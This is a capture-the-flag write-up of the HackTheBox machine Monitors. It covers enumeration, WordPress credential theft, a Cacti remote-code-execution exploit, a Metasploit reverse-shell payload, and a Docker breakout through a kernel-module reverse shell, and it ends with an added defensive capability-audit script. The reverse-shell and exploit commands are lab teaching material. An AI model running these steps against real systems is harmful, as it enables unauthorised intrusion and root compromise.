Monitors (HackTheBox) — Write-up
In this blog we will walk through the HackTheBox machine Monitors.
Like all machines, we begin by enumerating open ports with an nmap scan -
nmap -sC -sV 10.10.10.238
Since port 80 is hosting a web server, let's check it -
Direct access is blocked, so add monitors.htb to your /etc/hosts file and check again.
Now we get to know that this is a WordPress website, so let's try wpscan and find out if there is any vulnerable plugin -
wpscan --url http://www.monitors.htb
Here we find the plugin wp-with-spritz. While enumerating I found an Exploit-DB entry for it, https://www.exploit-db.com/exploits/44544, so this plugin is vulnerable. Let's check it using Burp Suite.
It worked. Now let's check the WordPress config file wp-config.php, which holds the database credentials.
Here we got the db_password. Now let's find where to use it by fuzzing; here we can see a file.
Now let's add cacti-admin.monitors.htb to our /etc/hosts file and check.
Here we can use the username and password we found earlier and successfully log in.
The version of this service (Cacti) is 1.2.12, which has an authenticated remote code execution exploit: https://www.exploit-db.com/exploits/49810
Now run -
nc -nlvp 4444
python3 exploit.py -t http://cacti-admin.monitors.htb -u admin -p (password) -lhost (your ip addr) -lport 4444
Now you will get a shell; first make it interactive using
python -c 'import pty;pty.spawn("/bin/bash")'
We still have not got the user flag. I found some files but was unable to read them, so I tried using
grep ‘marcus’ /etc -R 2>/dev/null
I looked at the content present in the file -
Here we got the password for the user marcus, so let's
ssh marcus@monitors.htb
Here I found docker was running, so I used netstat -tulnp and found port 8443 listening.
Now, to see what's running on it, let's forward the port
ssh -L 8443:127.0.0.1:8443 marcus@10.10.10.238
Now visit http://127.0.0.1:8443
This version (9.0.31) has an exploit related to deserialization: https://www.rapid7.com/db/modules/exploit/linux/http/apache_ofbiz_deserialiation/
Now run msfconsole
and set these options to set up the exploit
set PAYLOAD linux/x86/meterpreter/reverse_tcp
set LHOST 10.10.16.64
set RHOSTS 127.0.0.1
set FORCEEXPLOIT true
run
Now finally we got a shell; first make it interactive by running this command
python -c 'import pty;pty.spawn("/bin/bash")'
Now we are inside the docker container. Next we have to break out of the container to the host
capsh --print
Here we see cap_sys_module, which will help us get root: https://blog.pentesteracademy.com/abusing-sys-module-capability-to-perform-docker-container-breakout-cf5c29956edd
Copy the source code and Makefile to your local machine and edit the IP and port so that the reverse shell connects back to your listener on the host, then wget these files onto the target machine.
Now run -
make clean
make
After this succeeds, first listen on your local machine using
nc -nlvp 4445
Lastly, load the module inside the docker container:
insmod reverse-shell.ko
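As an added, defender-side example that is not from the original write-up: the cap_sys_module finding above is something a host owner can audit for. This Python script decodes the CapEff mask from /proc/<pid>/status (the same data capsh --print reports), flags capabilities that make a container root-equivalent on the host, and can be run on the host over every process. The sample status lines are constructed: Docker's default capability set, with and without SYS_MODULE added.

```python
import os
import re
# Linux capability bit numbers, in order (include/uapi/linux/capability.h).
CAP_NAMES = [
    "cap_chown", "cap_dac_override", "cap_dac_read_search", "cap_fowner",
    "cap_fsetid", "cap_kill", "cap_setgid", "cap_setuid", "cap_setpcap",
    "cap_linux_immutable", "cap_net_bind_service", "cap_net_broadcast",
    "cap_net_admin", "cap_net_raw", "cap_ipc_lock", "cap_ipc_owner",
    "cap_sys_module", "cap_sys_rawio", "cap_sys_chroot", "cap_sys_ptrace",
    "cap_sys_pacct", "cap_sys_admin", "cap_sys_boot", "cap_sys_nice",
    "cap_sys_resource", "cap_sys_time", "cap_sys_tty_config", "cap_mknod",
    "cap_lease", "cap_audit_write", "cap_audit_control", "cap_setfcap",
    "cap_mac_override", "cap_mac_admin", "cap_syslog", "cap_wake_alarm",
    "cap_block_suspend", "cap_audit_read", "cap_perfmon", "cap_bpf",
    "cap_checkpoint_restore",
]
# Capabilities that make a container root-equivalent on the host.
HOST_EQUIVALENT = {"cap_sys_module", "cap_sys_admin", "cap_sys_rawio",
                   "cap_sys_ptrace", "cap_dac_read_search"}

def decode_caps(mask):
    # Bit n of the mask set -> CAP_NAMES[n] is held.
    return {name for bit, name in enumerate(CAP_NAMES) if mask >> bit & 1}

def cap_eff_from_status(status_text):
    """Extract the effective capability mask from /proc/<pid>/status text."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)", status_text, re.MULTILINE)
    if m is None:
        raise ValueError("no CapEff line found")
    return int(m.group(1), 16)

def audit_status(status_text):
    # Sorted list of host-equivalent capabilities one process holds.
    return sorted(decode_caps(cap_eff_from_status(status_text)) & HOST_EQUIVALENT)

def audit_proc(proc="/proc"):
    """Run on the host: returns {pid: [risky caps]} for every process."""
    findings = {}
    for pid in filter(str.isdigit, os.listdir(proc)):
        try:
            with open(os.path.join(proc, pid, "status")) as f:
                risky = audit_status(f.read())
        except (OSError, ValueError):
            continue  # process exited, or no CapEff line
        if risky:
            findings[pid] = risky
    return findings

# Constructed samples: Docker's default set (a80425fb) and the same container
# started with --cap-add SYS_MODULE (bit 16 set: a80525fb).
DEFAULT_STATUS = "Name:\tbash\nCapEff:\t00000000a80425fb\n"
SYS_MODULE_STATUS = "Name:\tbash\nCapEff:\t00000000a80525fb\n"
```

Running audit_proc() as root on the docker host lists any container process that holds one of these capabilities, which is the configuration the breakout above depends on.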